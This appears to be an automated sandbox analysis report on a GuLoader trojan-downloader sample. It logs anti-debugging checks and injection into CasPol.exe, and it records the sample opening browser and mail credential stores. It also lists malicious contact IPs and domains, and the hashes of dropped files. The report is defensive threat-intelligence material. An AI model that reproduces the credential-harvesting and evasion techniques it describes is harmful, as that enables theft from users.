Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258CB1 mov eax, dword ptr fs:[00000030h]	1_2_03258CB1
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258C90 mov eax, dword ptr fs:[00000030h]	1_2_03258C90
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258CE4 mov ebx, dword ptr fs:[00000030h]	1_2_03258CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258CE4 mov eax, dword ptr fs:[00000030h]	1_2_03258CE4
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258AE0 mov eax, dword ptr fs:[00000030h]	1_2_03258AE0
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258AEC mov eax, dword ptr fs:[00000030h]	1_2_03258AEC
Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Code function: 1_2_03258CEC mov ebx, dword ptr fs:[00000030h]	1_2_03258CEC

Source: C:\Users\user\Desktop\SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: Yara match	File source: 00000003.00000002.42076762851.000000001D101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 8356, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
50.7.115.119	artist151sh.com	United States		174	COGENT-174US	true
173.254.28.216	mail.paralikgroup.com	United States		46606	UNIFIEDLAYER-AS-1US	true

ID:	635379
Product:	CloudBasic
Start time:	20:54:20
Start date:	27.05.2022
Sample:	SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe
Cookbook:	default.jbs
System description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Architecture:	WINDOWS
MD5:	e2e4196b84fdf8956baa7f99b11812af
SHA1:	7af0382928364f2fc088d13f96394f4d83bd01ae
SHA256:	7004d20bac532e4a93f138bae6da90223d850992fd1c88ba176bc9349b802c6a
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Windows Analysis Report SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
SecuriteInfo.com.UDS.Trojan-Downloader.Win32.GuLoader.gen.21079.exe

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\CYKELPARKERINGENS.ini	ASCII text, with CRLF line terminators	8B36E2227A5BD0472C64194B43581D90	E391FCABCE78C902A95B2B3A90F46380AA0E6031	7A5D1B27408729909236B8B98CD3D19002750B7297981F32A6E6DD743B16BFB4
C:\Users\user\AppData\Local\Temp\GL-1.0.typelib	HTML document, ASCII text, with CRLF line terminators	5343C1A8B203C162A3BF3870D9F50FD4	04B5B886C20D88B57EEA6D8FF882624A4AC1E51D	DC1D54DAB6EC8C00F70137927504E4F222C8395F10760B6BEECFCFA94E08249F
C:\Users\user\AppData\Local\Temp\HERMAPHRODEITY.ini	ASCII text, with CRLF line terminators	176F3A8631F14F0421935D07502B8CD9	70C91B54BDE9BA107AB322ECACF16C60E0D8E57B	F507F6BB14F286DD6835A18FC9ECDB86F73DBA96E9E281D626718447F1C496BB
C:\Users\user\AppData\Local\Temp\ThrottlePlugin.dll	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	07B4E869E84B557512EE38A5C283FEF3	85AFD748ACB7DB97C763ABFEA292E8543B084517	C718B6BF9A427A117FFC1AB1C0E02551AFB2675406BAC625534E02179DB12C9D
C:\Users\user\AppData\Local\Temp\applications-other.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	8C4F73C63672801A4629BA32BFAF9E31	C59877FEA56A2D45E36389366B0CCBC0AC2B720B	DFAFC0CCDCD4A2B74B8F74ECBE0BE82FC9FF3D055A8C9585DD78379DB7F01063
C:\Users\user\AppData\Local\Temp\folder-symbolic.symbolic.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	A008C1D205C5B08639C0A8D8673C6C72	5190570B97A6F75F1D10D3D1EC6E46AEC8705B0B	54A3EBAD22462339574D87D835CA626E039E9B38A625806BAA051F80A327C428
C:\Users\user\AppData\Local\Temp\nsn7515.tmp\System.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	CFF85C549D536F651D4FB8387F1976F2	D41CE3A5FF609DF9CF5C7E207D3B59BF8A48530E	8DC562CDA7217A3A52DB898243DE3E2ED68B80E62DDCB8619545ED0B4E7F65A8
C:\Users\user\AppData\Local\Temp\rt64win7.inf	Windows setup INFormation, Little-endian UTF-16 Unicode text, with CRLF line terminators	2D947C4C9147622CFC588FC5C17DDDEC	B367B48D1282E39E37B8992615FF9947DEE8CFED	EBB8155AC71DD53258CE3772F189B4771272BA55E15A6DABDE2BEA6896DC2CC3
C:\Users\user\AppData\Local\Temp\subfolder1\Toelike.exe	data	34770A449DF27F8C114F7CDCBA217401	D6DCEFE169654BF62ED52365464EE948BE8BA461	493381B41D8AFFB72163066BBD9C7C6345AF043E0541E5E344F79CE6B688A536
C:\Users\user\AppData\Local\Temp\trompetens.Pim9	data	0754E785FF6ECE6969E175C9B13C6FE1	A03D91669F72C2D8EEC2B86EB6490D6D6BA1A92B	F73CE6049A569409CA192ACD4E36766FA427FB2EF79D15F66DC870A4D04E2713
C:\Users\user\AppData\Local\Temp\user-not-tracked-symbolic.svg	SVG Scalable Vector Graphics image	8F7C767AFA41E6D03BDE59296DFF8175	EEFA541D3A06CAFEB62A535B86D1A95D6AAE1CD6	292770B23ED69AF4EDE9255BB66ADF3D3A0FF62D827D2BA05ED2C44A57228ED6
C:\Users\user\AppData\Local\Temp\video-joined-displays-symbolic.symbolic.png	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	E2FC23D36F5488D1F2888D524F933582	335CA8F69FF42E4418F0C95A9626F7B027F62139	07AEFFEAC02CD1501C54E5D66ED1816B83AF04E51B1676AF3C4A538FDC9E9E4A
\Device\ConDrv	ASCII text, with CRLF line terminators	9F754B47B351EF0FC32527B541420595	006C66220B33E98C725B73495FE97B3291CE14D9	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591